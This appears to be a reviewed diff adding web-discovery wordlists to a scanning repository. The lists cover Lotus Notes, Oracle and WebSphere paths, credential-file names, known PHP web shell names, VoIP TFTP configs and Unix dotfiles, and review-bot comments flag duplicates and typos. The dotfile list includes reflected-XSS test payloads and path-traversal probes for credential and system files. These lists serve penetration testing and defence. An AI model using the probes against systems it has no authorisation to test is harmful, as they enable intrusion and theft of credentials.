adm-bin/alerts.exe
|
||||
adm-bin/console.exe
|
||||
adm-bin/listdb.exe
|
||||
adm-bin/webstats.exe
|
||||
admin.nsf
|
||||
admin4.nsf
|
||||
admin5.nsf
|
||||
adminadm0disk.nsf
|
||||
adminadm0plog.nsf
|
||||
agentrunner.nsf
|
||||
agentrunner.nsf
|
||||
alog.nsf
|
||||
alog4.nsf
|
||||
archive/a_domlog.nsf
|
||||
archive/l_domlog.nsf
|
||||
billing.nsf
|
||||
bookmark.nsf
|
||||
bookmarks.nsf
|
||||
books.nsf
|
||||
busytime.nsf
|
||||
busytime.nsf
|
||||
calendar.nsf
|
||||
catalog.nsf
|
||||
catalog.nsf
|
||||
cersvr.nsf
|
||||
certa.nsf
|
||||
certlog.nsf
|
||||
certsrv.nsf
|
||||
certsrv.nsf
|
||||
chatlog.nsf
|
||||
clbusy.nsf
|
||||
cldbdir.nsf
|
||||
clusta4.nsf
|
||||
collect4.nsf
|
||||
cpa.nsf
|
||||
customerdata
|
||||
da.nsf
|
||||
database.nsf
|
||||
db.nsf
|
||||
dba4.nsf
|
||||
dbdirman.nsf
|
||||
dclf.nsf
|
||||
decsadm.nsf
|
||||
decsadm.nsf
|
||||
decslog.nsf
|
||||
default.nsf
|
||||
deslog.nsf
|
||||
diiop_ior.txt
|
||||
dirassist.nsf
|
||||
doc/dspug.nsf
|
||||
doc/helpadmn.nsf
|
||||
doc/javapg.nsf
|
||||
doc/readmec.nsf
|
||||
doladmin.nsf
|
||||
domadmin.nsf
|
||||
domcfg.nsf
|
||||
domguide.nsf
|
||||
domlog.nsf
|
||||
domlog.nsf
|
||||
dspug.nsf
|
||||
dspug.nsf
|
||||
event.nsf
|
||||
events.nsf
|
||||
events4.nsf
|
||||
events4.nsf
|
||||
events5.nsf
|
||||
group.nsf
|
||||
groups.nsf
|
||||
help/decsdoc.nsf
|
||||
help/decsdoc6.nsf
|
||||
help/dols_help.nsf
|
||||
help/help5_admin.nsf
|
||||
help/help5_client.nsf
|
||||
help/help5_designer.nsf
|
||||
help/help65_admin.nsf
|
||||
help/help65_client.nsf
|
||||
help/help65_designer.nsf
|
||||
help/lccon.nsf
|
||||
help/lccon6.nsf
|
||||
help/lsxlc.nsf
|
||||
help/lsxlc6.nsf
|
||||
help/readme.nsf
|
||||
help4.nsf
|
||||
helplt4.nsf
|
||||
hidden.nsf
|
||||
homepage.nsf
|
||||
iNotes/Forms5.nsf
|
||||
iNotes/Forms5.nsf/$DefaultNav
|
||||
iNotes/Forms6.nsf
|
||||
iNotes/help65_iwa_en.nsf
|
||||
iNotesForms5.nsf
|
||||
jotter.nsf
|
||||
l_domlog.nsf
|
||||
lccon.nsf
|
||||
ldap.nsf
|
||||
leiadm.nsf
|
||||
leilog.nsf
|
||||
leivlt.nsf
|
||||
lndfr.nsf
|
||||
log.nsf
|
||||
log.nsf
|
||||
log4a.nsf
|
||||
loga4.nsf
|
||||
lsxlc.nsf
|
||||
mab.nsf
|
||||
mail.box
|
||||
mail.box
|
||||
mail/NOMBRE_USUARIO.nsf
|
||||
mail/admin.nsf
|
||||
mail/pxp.nsf
|
||||
mail1.box
|
||||
mail10.box
|
||||
mail2.box
|
||||
mail3.box
|
||||
mail4.box
|
||||
mail5.box
|
||||
mail6.box
|
||||
mail7.box
|
||||
mail8.box
|
||||
mail9.box
|
||||
mailw46.nsf
|
||||
msdwda.nsf
|
||||
mtatbls.nsf
|
||||
mtstore.nsf
|
||||
names.nsf
|
||||
names.nsf
|
||||
nntp/nd000000.nsf
|
||||
nntp/nd000001.nsf
|
||||
nntp/nd000002.nsf
|
||||
nntp/nd000003.nsf
|
||||
nntp/nd000004.nsf
|
||||
nntppost.nsf
|
||||
nntppost.nsf
|
||||
notes.nsf
|
||||
ntsync4.nsf
|
||||
ntsync45.nsf
|
||||
ntsync45.nsf
|
||||
patrol41.nsf
|
||||
perweb.nsf
|
||||
private.nsf
|
||||
proghelp/KBCCV11.NSF
|
||||
proghelp/KBNV11.NSF
|
||||
proghelp/KBSSV11.NSF
|
||||
public.nsf
|
||||
puserinfo.nsf
|
||||
qpadmin.nsf
|
||||
qstart.nsf
|
||||
quickplace/quickplace/main.nsf
|
||||
quickplacequickplacemain.nsf
|
||||
quickstart/qstart50.nsf
|
||||
quickstart/wwsample.nsf
|
||||
readme.nsf
|
||||
reports.nsf
|
||||
reports.nsf
|
||||
resource.nsf
|
||||
sample/faqw46.nsf
|
||||
sample/framew46.nsf
|
||||
sample/pagesw46.nsf
|
||||
sample/siregw46.nsf
|
||||
sample/site1w46.nsf
|
||||
sample/site2w46.nsf
|
||||
sample/site3w46.nsf
|
||||
schema.nsf
|
||||
schema50.nsf
|
||||
schema50.nsf
|
||||
secret.nsf
|
||||
setup.nsf
|
||||
setup.nsf
|
||||
setupweb.nsf
|
||||
setupweb.nsf
|
||||
smbcfg.nsf
|
||||
smbcfg.nsf
|
||||
smconf.nsf
|
||||
smency.nsf
|
||||
smhelp.nsf
|
||||
smmsg.nsf
|
||||
smquar.nsf
|
||||
smsolar.nsf
|
||||
smtime.nsf
|
||||
smtp.box
|
||||
smtp.nsf
|
||||
smtpibwq.nsf
|
||||
smtpobwq.nsf
|
||||
smtptbls.nsf
|
||||
smvlog.nsf
|
||||
software.nsf
|
||||
srvnam.htm
|
||||
srvnam.nsf
|
||||
statauths.nsf
|
||||
statautht.nsf
|
||||
statmail.nsf
|
||||
statmail.nsf
|
||||
statrep.nsf
|
||||
statrep.nsf
|
||||
stauths.nsf
|
||||
stautht.nsf
|
||||
stconf.nsf
|
||||
stconf.nsf
|
||||
stconfig.nsf
|
||||
stconfig.nsf
|
||||
stdnaset.nsf
|
||||
stdnaset.nsf
|
||||
stdomino.nsf
|
||||
stlog.nsf
|
||||
stlog.nsf
|
||||
streg.nsf
|
||||
stsrc.nsf
|
||||
stsrc.nsf
|
||||
test.nsf
|
||||
userreg.nsf
|
||||
users.nsf
|
||||
vpuserinfo.nsf
|
||||
web.nsf
|
||||
web.nsf
|
||||
webadmin.nsf
|
||||
welcome.nsf
|
||||
|
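Review bot: interesting-files-lotus-notes.txt repeats many entries, both exactly (`agentrunner.nsf`, `busytime.nsf` and `catalog.nsf` each appear twice in the unprefixed part) and as the same name with and without a leading slash (`/admin.nsf` near the top, `admin.nsf` further down). Pick one convention for the leading slash and deduplicate, so that a consumer of the list does not issue the same request twice. `mail/NOMBRE_USUARIO.nsf` also reads as an unfilled user-name placeholder; either document that it has to be substituted before use or drop it.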
|
@ -0,0 +1,163 @@
|
|||
*.jsp
|
||||
Adaptador
|
||||
Admin
|
||||
AggreSpy
|
||||
Apps
|
||||
BBoardServlet
|
||||
BPELConsole
|
||||
ConfigServlet
|
||||
CookieExample
|
||||
Counter
|
||||
DateServlet
|
||||
EJB
|
||||
EMDServlet
|
||||
FE
|
||||
HelloWorldServlet
|
||||
HelloworldExample
|
||||
HelloworldServlet
|
||||
HttpSoap12
|
||||
JMSRouter_MBean_starter
|
||||
JMXSoapAdapter
|
||||
JMXSoapAdapter-web
|
||||
JSP
|
||||
OHW
|
||||
Oracle
|
||||
OracleASjms
|
||||
RedirectServlet
|
||||
RequestHeaderExample
|
||||
RequestInfoExample
|
||||
RequestParamExample
|
||||
Servlet
|
||||
ServletToJsp
|
||||
Servlets
|
||||
SessionExample
|
||||
SessionServlet
|
||||
SimpleServlet
|
||||
SnoopServlet
|
||||
Spy
|
||||
ToJSPServlet
|
||||
ViewSrc
|
||||
_pages
|
||||
admin_ejb
|
||||
aqserv/servlet
|
||||
ascontrol
|
||||
basic
|
||||
bc4j
|
||||
bc4j.jsp
|
||||
bpel
|
||||
cabo
|
||||
cal
|
||||
catalog
|
||||
ccore
|
||||
cgi-bin
|
||||
console
|
||||
console
|
||||
console/*
|
||||
console/help/*
|
||||
dav_public
|
||||
default
|
||||
defaultWebApp
|
||||
dms
|
||||
dms/AggreSpy
|
||||
dms/Spy
|
||||
dms0
|
||||
dms0/AggreSpy
|
||||
dms0/Spy
|
||||
dmsoc4j
|
||||
dmsoc4j/AggreSpy
|
||||
dynamicImage
|
||||
dynamicImage
|
||||
dynamicImage/*
|
||||
echo
|
||||
echo2
|
||||
em
|
||||
esb
|
||||
esb/
|
||||
examples
|
||||
examples/jsp/jsp2/misc/config.jsp
|
||||
examples/jsp/snp/snoop.jsp
|
||||
false
|
||||
fcgi-bin
|
||||
fcgi-bin/echo
|
||||
fcgi-bin/echo.exe
|
||||
fcgi-bin/echo2
|
||||
fcgi-bin/echo2.exe
|
||||
hellouser
|
||||
hellouser.jsp
|
||||
home
|
||||
home/oas/OraHome_1/
|
||||
ias/cluster/appServer.jsp
|
||||
ias/cluster/topology.jsp
|
||||
ias/faintTabsInclude.jsp
|
||||
ias/oc4j/admin/j2eeWebsites.jsp
|
||||
ias/oc4j/admin/websites/wsHome.jsp
|
||||
ias/oc4j/administration.jsp
|
||||
ias/oc4j/app/appHome.jsp
|
||||
ias/oc4j/app/appViewDesc.jsp
|
||||
index.html
|
||||
index.jsp
|
||||
index_jsp
|
||||
index_jsp
|
||||
j2ee
|
||||
javacachedocs
|
||||
jmsrouter
|
||||
jmsrouter_ejb
|
||||
jmsrouter_web
|
||||
jsp
|
||||
jspdocs
|
||||
jspsamples
|
||||
login.html
|
||||
logon.jsp
|
||||
netbanking
|
||||
no
|
||||
oas
|
||||
oc4j
|
||||
oc4j-status
|
||||
oc4jadmin
|
||||
oiddas
|
||||
oiddas/ui/oracle/ldap/das
|
||||
ojspdemos
|
||||
oprocmgr-service
|
||||
oracle
|
||||
perl
|
||||
petstore
|
||||
portlist
|
||||
printenv
|
||||
ruleauthor
|
||||
servlet
|
||||
servlet/BBoardServlet
|
||||
servlet/ConfigServlet
|
||||
servlet/CookieExample
|
||||
servlet/Counter
|
||||
servlet/DateServlet
|
||||
servlet/HelloWorldExample
|
||||
servlet/HelloWorldServlet
|
||||
servlet/RedirectServlet
|
||||
servlet/RequestHeaderExample
|
||||
servlet/RequestInfoExample
|
||||
servlet/RequestParamExample
|
||||
servlet/SessionExample
|
||||
servlet/SessionServlet
|
||||
servlet/SimpleServlet
|
||||
servlet/SnoopServlet
|
||||
servlet/ToJSPServlet
|
||||
servlet/ViewSrc
|
||||
servlet/ViewSrc/*
|
||||
servlet/servletToJsp
|
||||
shutdown
|
||||
simple
|
||||
snoop.jsp
|
||||
snp
|
||||
stressH
|
||||
system
|
||||
testru
|
||||
testunit
|
||||
transtrace
|
||||
true
|
||||
uixi
|
||||
usebean.jsp
|
||||
utility
|
||||
webapp
|
||||
webapp/wm/bc4j.jsp
|
||||
welcomeuser.jsp
|
||||
wm
|
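Review bot: `console`, `dynamicImage` and `index_jsp` are each added twice, and the bare entries `true`, `false` and `no` read like stray values rather than resource names. Drop the duplicates, and either remove those three or document what they are meant to match. `HelloworldExample` near the top and `servlet/HelloWorldExample` further down also differ in case, which matters on a case-sensitive server, so confirm which spelling is intended.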
24
discovery/generic/interesting-files-random.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
accounts.txt
|
||||
culeadora.txt
|
||||
data.txt
|
||||
database.txt
|
||||
grabbed.html
|
||||
info.txt
|
||||
l0gs.txt
|
||||
log.txt
|
||||
logins.txt
|
||||
logs.txt
|
||||
members.txt
|
||||
pass.txt
|
||||
passes.txt
|
||||
password.html
|
||||
password.txt
|
||||
passwords.html
|
||||
passwords.txt
|
||||
pazz.txt
|
||||
pazzezs.txt
|
||||
pw.txt
|
||||
pws.txt
|
||||
technico.txt
|
||||
usernames.txt
|
||||
users.txt
|
366
discovery/generic/interesting-files-websphere.txt
Normal file
|
@ -0,0 +1,366 @@
|
|||
*
|
||||
*.do
|
||||
*.jsp
|
||||
*.jsv
|
||||
*.jsw
|
||||
AddressBookJ2WB
|
||||
AddressBookJ2WB/*
|
||||
AddressBookJ2WE/*.jsp
|
||||
AddressBookJ2WE/*.jsv
|
||||
AddressBookJ2WE/*.jsw
|
||||
AddressBookJ2WE/services/AddressBook
|
||||
AddressBookJ2WE/services/AddressBook/wsdl/*
|
||||
AddressBookW2JB
|
||||
AddressBookW2JB/*
|
||||
AddressBookW2JE/*.jsp
|
||||
AddressBookW2JE/*.jsv
|
||||
AddressBookW2JE/*.jsw
|
||||
AddressBookW2JE/services/AddressBook
|
||||
AddressBookW2JE/services/AddressBook/wsdl/*
|
||||
AlbumCatalogWeb
|
||||
AlbumCatalogWeb/*
|
||||
AlbumCatalogWeb/docs/*
|
||||
AlbumCatalogWeb/docsservlet
|
||||
AlbumCatalogWeb/docsservlet/*
|
||||
AlbumCatalogWebservlet
|
||||
AlbumCatalogWebservlet/*
|
||||
AppInstallStatusServlet
|
||||
AppManagementStatus
|
||||
AppServer
|
||||
ApplicationProfileSample
|
||||
ApplicationProfileSample/*
|
||||
ApplicationProfileSample/docs/*
|
||||
ApplicationProfileSampleservlet
|
||||
ApplicationProfileSampleservlet/*
|
||||
BBApp
|
||||
Bank/*.jsp
|
||||
Bank/*.jsv
|
||||
Bank/*.jsw
|
||||
Bank/services/Transfer_SEI
|
||||
Bank/services/Transfer_SEI/wsdl
|
||||
Bank/services/Transfer_SEI/wsdl/*
|
||||
BeenThere
|
||||
ClusterRollout
|
||||
ControllerServlet
|
||||
DynaCacheESI
|
||||
DynaCacheESI/esiInavlidator
|
||||
DynamicQuery/EmployeeFinder
|
||||
DynamicQuery/EmployeeFinder/*
|
||||
DynamicQuery/docs/*
|
||||
ErrorReporter
|
||||
ErrorServlet
|
||||
FileTransfer
|
||||
GalleryMenu
|
||||
Greenhouse
|
||||
Greenhouse/*
|
||||
GreenhouseByWebSphere/docs/*
|
||||
GreenhouseEJB/*.jsp
|
||||
GreenhouseEJB/*.jsv
|
||||
GreenhouseEJB/*.jsw
|
||||
GreenhouseEJB/services/GreenhouseFront
|
||||
GreenhouseEJB/services/GreenhouseFront/wsdl/*
|
||||
GreenhouseWeb
|
||||
GreenhouseWeb/*
|
||||
GreenhouseWebservlet
|
||||
GreenhouseWebservlet/*
|
||||
Greenhouseservlet
|
||||
Greenhouseservlet/*
|
||||
HelloHTML.jsp
|
||||
HelloHTMLError.jsp
|
||||
HelloPervasive
|
||||
HelloVXML.jsp
|
||||
HelloVXMLError.jsp
|
||||
HelloWML.jsp
|
||||
HelloWMLError.jsp
|
||||
HelloWorld
|
||||
HelloWorldServlet
|
||||
HitCount
|
||||
HitCount.jsp
|
||||
IBMDefaultErrorReporter
|
||||
IBMWebAS
|
||||
JTAExtensionsSamples/TransactionTracker
|
||||
JTAExtensionsSamples/TransactionTracker/*
|
||||
JTAExtensionsSamples/docs/*
|
||||
MANIFEST.MF
|
||||
META-INF
|
||||
MessageDrivenBeans/docs/*
|
||||
MessageDrivenBeans/docsservlet/*
|
||||
OrderProcessorEJB/*
|
||||
OrderProcessorEJB/*.jsp
|
||||
OrderProcessorEJB/*.jsv
|
||||
OrderProcessorEJB/*.jsw
|
||||
OrderProcessorEJB/services/FrontGate
|
||||
OrderProcessorEJB/services/FrontGate/wsdl/*
|
||||
PlantsByWebSphere
|
||||
PlantsByWebSphere/*
|
||||
PlantsByWebSphere/docs
|
||||
SamplesGallery
|
||||
SamplesGallery/*
|
||||
SimpleServlet
|
||||
SnoopServlet
|
||||
SourceCodeViewer
|
||||
Sourceservlet-classViewer
|
||||
StockQuote/*.jsp
|
||||
StockQuote/*.jsv
|
||||
StockQuote/*.jsw
|
||||
StockQuote/services/xmltoday-delayed-quotes
|
||||
StockQuote/services/xmltoday-delayed-quotes/wsdl/*
|
||||
TechnologySamples/AddressBook
|
||||
TechnologySamples/AddressBook/*
|
||||
TechnologySamples/AddressBook/*.jsp
|
||||
TechnologySamples/AddressBook/*.jsv
|
||||
TechnologySamples/AddressBook/*.jsw
|
||||
TechnologySamples/AddressBook/AddressBookServlet
|
||||
TechnologySamples/AddressBook/servlet/*
|
||||
TechnologySamples/BasicCalculator
|
||||
TechnologySamples/BasicCalculator/*
|
||||
TechnologySamples/BulletinBoard
|
||||
TechnologySamples/BulletinBoard/*
|
||||
TechnologySamples/BulletinBoardservlet
|
||||
TechnologySamples/BulletinBoardservlet/*
|
||||
TechnologySamples/Calendar
|
||||
TechnologySamples/Calendar/*
|
||||
TechnologySamples/FilterServlet
|
||||
TechnologySamples/FilterServlet/*
|
||||
TechnologySamples/FormLogin
|
||||
TechnologySamples/FormLogin/*
|
||||
TechnologySamples/FormLoginservlet
|
||||
TechnologySamples/FormLoginservlet/*
|
||||
TechnologySamples/JAASLogin
|
||||
TechnologySamples/JAASLogin/*
|
||||
TechnologySamples/JAASLoginservlet
|
||||
TechnologySamples/JAASLoginservlet/*
|
||||
TechnologySamples/MovieReview
|
||||
TechnologySamples/MovieReview/*
|
||||
TechnologySamples/MovieReview2_0
|
||||
TechnologySamples/MovieReview2_0/*
|
||||
TechnologySamples/MovieReview2_1
|
||||
TechnologySamples/MovieReview2_1/*
|
||||
TechnologySamples/PageReturner
|
||||
TechnologySamples/PageReturner/*
|
||||
TechnologySamples/PageReturnerservlet
|
||||
TechnologySamples/PageReturnerservlet/*
|
||||
TechnologySamples/ReadingList
|
||||
TechnologySamples/ReadingList/*
|
||||
TechnologySamples/SimpleJSP
|
||||
TechnologySamples/SimpleJSP/*
|
||||
TechnologySamples/SimpleServlet
|
||||
TechnologySamples/SimpleServlet/*
|
||||
TechnologySamples/Subscription
|
||||
TechnologySamples/Subscription/*
|
||||
TechnologySamples/Subscriptionservlet
|
||||
TechnologySamples/Subscriptionservlet/*
|
||||
TechnologySamples/Taglib
|
||||
TechnologySamples/Taglib/*
|
||||
TechnologySamples/docs
|
||||
WEB-INF
|
||||
WEB-INF./web.xml
|
||||
WEB-INF/web.xml
|
||||
WSsamples
|
||||
WSsamples/*
|
||||
WSsamples/de
|
||||
WSsamples/de/*
|
||||
WSsamples/en
|
||||
WSsamples/en/*
|
||||
WSsamples/es
|
||||
WSsamples/es/*
|
||||
WSsamples/fr
|
||||
WSsamples/fr/*
|
||||
WSsamples/index.jsp
|
||||
WSsamples/it
|
||||
WSsamples/it/*
|
||||
WSsamples/ja
|
||||
WSsamples/ja/*
|
||||
WSsamples/ko
|
||||
WSsamples/ko/*
|
||||
WSsamples/pt_br
|
||||
WSsamples/pt_br/*
|
||||
WSsamples/zh_cn
|
||||
WSsamples/zh_cn/*
|
||||
WSsamples/zh_tw
|
||||
WSsamples/zh_tw/*
|
||||
WarehouseEJB/*.jsp
|
||||
WarehouseEJB/*.jsv
|
||||
WarehouseEJB/*.jsw
|
||||
WarehouseEJB/services/WarehouseFront
|
||||
WarehouseEJB/services/WarehouseFront/wsdl/*
|
||||
WarehouseWeb
|
||||
WarehouseWeb/*
|
||||
WarehouseWebservlet
|
||||
WarehouseWebservlet/*
|
||||
WebServicesSamples/docs/*
|
||||
WebSphere
|
||||
WebSphereBank
|
||||
WebSphereBank/*
|
||||
WebSphereBank/docs/*
|
||||
WebSphereBankDeposit
|
||||
WebSphereBankDeposit/*
|
||||
WebSphereBankDepositservlet
|
||||
WebSphereBankDepositservlet/*
|
||||
WebSphereBankservlet
|
||||
WebSphereBankservlet/*
|
||||
WebSphereSamples
|
||||
WebSphereSamples.Configuration.config
|
||||
WebSphereSamples/
|
||||
WebSphereSamples/SingleSamples/AccountAndTransfer/create.html
|
||||
WebSphereSamples/SingleSamples/Increment/increment.html
|
||||
WebSphereSamples/YourCo/main.html
|
||||
_DynaCacheEsi
|
||||
_DynaCacheEsi/*
|
||||
_DynaCacheEsi/esiInvalidator
|
||||
ab/*
|
||||
ab/docs/*
|
||||
activitysessions/docs/*
|
||||
addNodeListener
|
||||
admin
|
||||
admin-authz.xml
|
||||
admin.conf
|
||||
admin.passwd
|
||||
admin/*
|
||||
admin/logon.jsp
|
||||
admin/secure/logon.jsp
|
||||
apadminred
|
||||
apadminred.html
|
||||
aphtpasswd.html
|
||||
asynchbeans/*
|
||||
asynchbeans/docs/*
|
||||
cachemonitor
|
||||
cachemonitor/statistics.jsp
|
||||
cell.xml
|
||||
cells
|
||||
cgi-bin
|
||||
cgi-bin/
|
||||
com.ibm.ws.console.events
|
||||
com.ibm.ws.console.events/runtime_messages.jsp
|
||||
config
|
||||
console
|
||||
debug_error.jsp
|
||||
error
|
||||
error.jsp
|
||||
esiInavlidator
|
||||
estore
|
||||
estore/annotated-index.html
|
||||
estore/index.html
|
||||
estore/populate
|
||||
examples
|
||||
hello
|
||||
helloEJB
|
||||
hitcount
|
||||
httpd.conf
|
||||
i18nctxSample
|
||||
i18nctxSample/*
|
||||
i18nctxSample/docs/*
|
||||
ibm
|
||||
ibm/console
|
||||
ibm_security_logout
|
||||
icons
|
||||
images
|
||||
index.html
|
||||
index.jsp
|
||||
ivt
|
||||
ivt/*
|
||||
ivt/ivtDate.jsp
|
||||
ivt/ivtejb
|
||||
ivt/ivtservler
|
||||
ivt/ivtservlet
|
||||
ivtejb
|
||||
ivtserver
|
||||
ivtservlet
|
||||
j_security_check
|
||||
jsp
|
||||
login.html
|
||||
manual
|
||||
manual/index.html
|
||||
node.xml
|
||||
nodes
|
||||
opc/*.jsp
|
||||
opc/*.jsv
|
||||
opc/*.jsw
|
||||
opc/services/BrokerServiceIntfPort
|
||||
opc/services/BrokerServiceIntfPort/wsdl/*
|
||||
opc/services/OrderTrackingIntfPort
|
||||
opc/services/OrderTrackingIntfPort/wsdl/*
|
||||
opc/services/PurchaseOrderIntfPort
|
||||
opc/services/PurchaseOrderIntfPort/wsdl/*
|
||||
opt
|
||||
petstore
|
||||
petstore/*
|
||||
ping
|
||||
removeNodeListener
|
||||
resources.xml
|
||||
runtime_messages.jsp
|
||||
samples/activitysessions
|
||||
samples/activitysessions/*
|
||||
scheduler
|
||||
scheduler/*
|
||||
scheduler/docs/*
|
||||
scripts
|
||||
secure/downloadFile/*
|
||||
securecleanup
|
||||
security.xml
|
||||
server-info
|
||||
server-status
|
||||
server.xml
|
||||
serverindex.xml
|
||||
servers
|
||||
servlet
|
||||
servlet/*
|
||||
servlet/ControllerServlet
|
||||
servlet/ErrorReporter
|
||||
servlet/HelloWorldServlet
|
||||
servlet/HitCount
|
||||
servlet/SimpleServlet
|
||||
servlet/SnoopServlet
|
||||
servlet/TheExpiringHTMLServlet
|
||||
servlet/WebSphereSamples.Configuration.config
|
||||
servlet/WebSphereSamples.Form.FormServlet
|
||||
servlet/WebSphereSamples.YourCo.News.NewsServlet
|
||||
servlet/aphtpassword
|
||||
servlet/com.ibm.as400ad.webfacing.runtime.httpcontroller.ControllerServlet
|
||||
servlet/com.ibm.servlet.engine.webapp.DefaultErrorReporter
|
||||
servlet/com.ibm.servlet.engine.webapp.InvokerServlet
|
||||
servlet/com.ibm.servlet.engine.webapp.SimpleFileServlet
|
||||
servlet/com.ibm.servlet.engine.webapp.UncaughtServletException
|
||||
servlet/com.ibm.servlet.engine.webapp.WebAppErrorReport
|
||||
servlet/hello
|
||||
servlet/snoop
|
||||
servlet/snoop2
|
||||
servletcache
|
||||
showCfg
|
||||
sibstatus
|
||||
simple.jsp
|
||||
simpleJSP
|
||||
snoop
|
||||
snoop/*
|
||||
snoop2
|
||||
statistics.jsp
|
||||
status
|
||||
statuspoll
|
||||
theme
|
||||
tradetheme
|
||||
transfer
|
||||
uddigui/*
|
||||
uddisoap/*
|
||||
variables.xml
|
||||
very_simple.jsp
|
||||
virtualhosts.xml
|
||||
wasPerfTool
|
||||
wasPerfTool/*
|
||||
wasPerfToolservlet
|
||||
wasPerfToolservlet/*
|
||||
web.xml
|
||||
webapp
|
||||
webapp/examples/ErrorServlet
|
||||
webapp/examples/HelloPervasive
|
||||
webapp/examples/HitCount
|
||||
webapp/examples/SourceCodeViewer
|
||||
webapp/examples/login.html
|
||||
webapp/examples/ping
|
||||
webapp/examples/showCfg
|
||||
webapp/examples/showcfg
|
||||
webapp/examples/simple.jsp
|
||||
webapp/examples/verify
|
||||
webexec
|
||||
workarea/*
|
||||
workarea/docs/*
|
||||
|
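Review bot: `DynaCacheESI/esiInavlidator` and the bare `esiInavlidator` look like misspellings of `esiInvalidator`, which is spelled correctly in `_DynaCacheEsi/esiInvalidator`, and `ivt/ivtservler` sits directly above `ivt/ivtservlet`. If the misspelt forms are not deliberate, remove them. The list also mixes literal paths with glob patterns (`*`, `*.do`, `AddressBookJ2WB/*`) without a comment saying how a consumer should expand them, so a tool that sends each line verbatim will request a literal `*`. A one-line `#` header describing the pattern syntax would fix that.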
5
discovery/generic/php-common-backdoors.txt
Normal file
|
@ -0,0 +1,5 @@
|
|||
c99.php
|
||||
c99shell.php
|
||||
r57.php
|
||||
r58.php
|
||||
dra.php
|
79
discovery/generic/tftp.txt
Normal file
|
@ -0,0 +1,79 @@
|
|||
# files commonly transmitted via tftp
|
||||
000000000000.cfg
|
||||
000000000000-directory~.xml
|
||||
323tosip1_1.bin
|
||||
4601_02_readme_R2_3.txt
|
||||
4601dbte1_82.bin
|
||||
4602_02SWSIPreadme_R1_1.txt
|
||||
4602dbte1_82.bin
|
||||
4602sbte1_82.bin
|
||||
4610_20_readme_R2_3.txt
|
||||
4610_20_readme_SIP_R2_2.txt
|
||||
4624_12_06readme_1_8_3.txt
|
||||
4625_readme_2_5.txt
|
||||
4690_010707.bin
|
||||
4690_readme_1_7_7.txt
|
||||
46xxreadme_111405.txt
|
||||
46xxsettings.txt
|
||||
46xxupgrade.scr
|
||||
a01d01b2_3.bin
|
||||
a02d01b2_3.bin
|
||||
a10d01b2_3.bin
|
||||
a20d01a2_3.bin
|
||||
a20d01b2_3.bin
|
||||
a25d01a2_5.bin
|
||||
b01d01b2_3.bin
|
||||
b02d01b2_3.bin
|
||||
b10d01b2_3.bin
|
||||
b20d01a2_3.bin
|
||||
b20d01b2_3.bin
|
||||
b25d01a2_5.bin
|
||||
bbla0_83.bin
|
||||
bootrom.ld
|
||||
cisco_util
|
||||
CP7912010301SIP050608A.sbin
|
||||
cvt01_2_3.bin
|
||||
cvt02_2_3.bin
|
||||
cvt02sw_2_3.bin
|
||||
def06r1_8_3.bin
|
||||
def24r1_8_3.bin
|
||||
dialplan.xml
|
||||
gkdefault.cfg
|
||||
infrared.txt
|
||||
merlin2.pcm
|
||||
OS79XX.TXT
|
||||
P003-07-5-00.bin
|
||||
P003-07-5-00.sbn
|
||||
P0S3-07-5-00.bin
|
||||
P0S3-07-5-00.loads
|
||||
P0S3-07-5-00.sb2
|
||||
phbook00e011010455.txt
|
||||
phone1.cfg
|
||||
release.xml
|
||||
RINGLIST.DAT
|
||||
s10d01b2_2.bin
|
||||
s20d01b2_2.bin
|
||||
SEP000F34118045.cnf
|
||||
SEP001562EA69E8.cnf
|
||||
SEPDefault.cnf
|
||||
SIP000F34118045.cnf
|
||||
SIPinsertMAChere.cnf
|
||||
SIPinsertMAChere.cnf
|
||||
sip_4602ap1_1.ebin
|
||||
sip_4602bt1_1.ebin
|
||||
sip_4602D01A.txt
|
||||
sip_4602D02A.txt
|
||||
sip.cfg
|
||||
SIPDefault.cnf
|
||||
sip.ld
|
||||
sipto323_1_1.ebin
|
||||
sip.ver
|
||||
SoundPointIPLocalization
|
||||
SoundPointIPWelcome.wav
|
||||
syncinfo.xml
|
||||
test
|
||||
test.txt
|
||||
uip200_463enc.pac
|
||||
uniden00e011030397.txt
|
||||
unidencom.txt
|
||||
XMLDefault.cnf.xml
|
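Review bot: `SIPinsertMAChere.cnf` is added twice, and it is a template name that needs a MAC address substituted before it can match anything, which the only comment in the file (`# files commonly transmitted via tftp`) does not say. Keep one copy and document the placeholder, and note that `SEP000F34118045.cnf`, `SEP001562EA69E8.cnf` and `SIP000F34118045.cnf` are tied to specific device MACs, so they are examples of the naming scheme rather than generally useful entries.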
51
discovery/unix/interesting-files-dotfiles.txt
Normal file
|
@ -0,0 +1,51 @@
|
|||
/.DS_Store
|
||||
/.FBCIndex
|
||||
/.access
|
||||
/.addressbook
|
||||
/.bash_history
|
||||
/.bashrc
|
||||
/.cobalt
|
||||
/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
|
||||
/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
|
||||
/.cobalt/sysManage/../admin/.htaccess
|
||||
/.fhp
|
||||
/.forward
|
||||
/.history
|
||||
/.htaccess
|
||||
/.htaccess.old
|
||||
/.htaccess.save
|
||||
/.htaccess~
|
||||
/.htpasswd
|
||||
/.lynx_cookies
|
||||
/.mysql_history
|
||||
/.nsconfig
|
||||
/.nsf/../winnt/win.ini
|
||||
/.passwd
|
||||
/.perf
|
||||
/.pinerc
|
||||
/.plan
|
||||
/.proclog
|
||||
/.procmailrc
|
||||
/.profile
|
||||
/.psql_history
|
||||
/.rhosts
|
||||
/.sh_history
|
||||
/.ssh
|
||||
/.ssh/authorized_keys
|
||||
/.ssh/known_hosts
|
||||
/.www_acl
|
||||
/.wwwacl
|
||||
/.access
|
||||
/.cobalt
|
||||
/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
|
||||
/.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
|
||||
/.fhp
|
||||
/.htaccess
|
||||
/.htaccess.old
|
||||
/.htaccess.save
|
||||
/.htaccess~
|
||||
/.htpasswd
|
||||
/.nsconfig
|
||||
/.passwd
|
||||
/.www_acl
|
||||
/.wwwacl
|
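Review bot: the last fourteen entries, from the second `/.access` through the second `/.wwwacl`, repeat paths already listed above; the only difference is that the two `/.cobalt/alert/service.cgi` requests use `alert('XSS')` instead of `alert('Vulnerable')`. Remove the repeated block and keep one marker string for the two payload lines. Separately, `/.nsf/../winnt/win.ini` targets a Windows path but is filed under `discovery/unix/`, and the `service.cgi` lines are reflected-script test requests rather than dotfile names, so both would be easier to maintain in lists dedicated to those checks.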
36
discovery/unix/interesting-files-iplanet.txt
Normal file
|
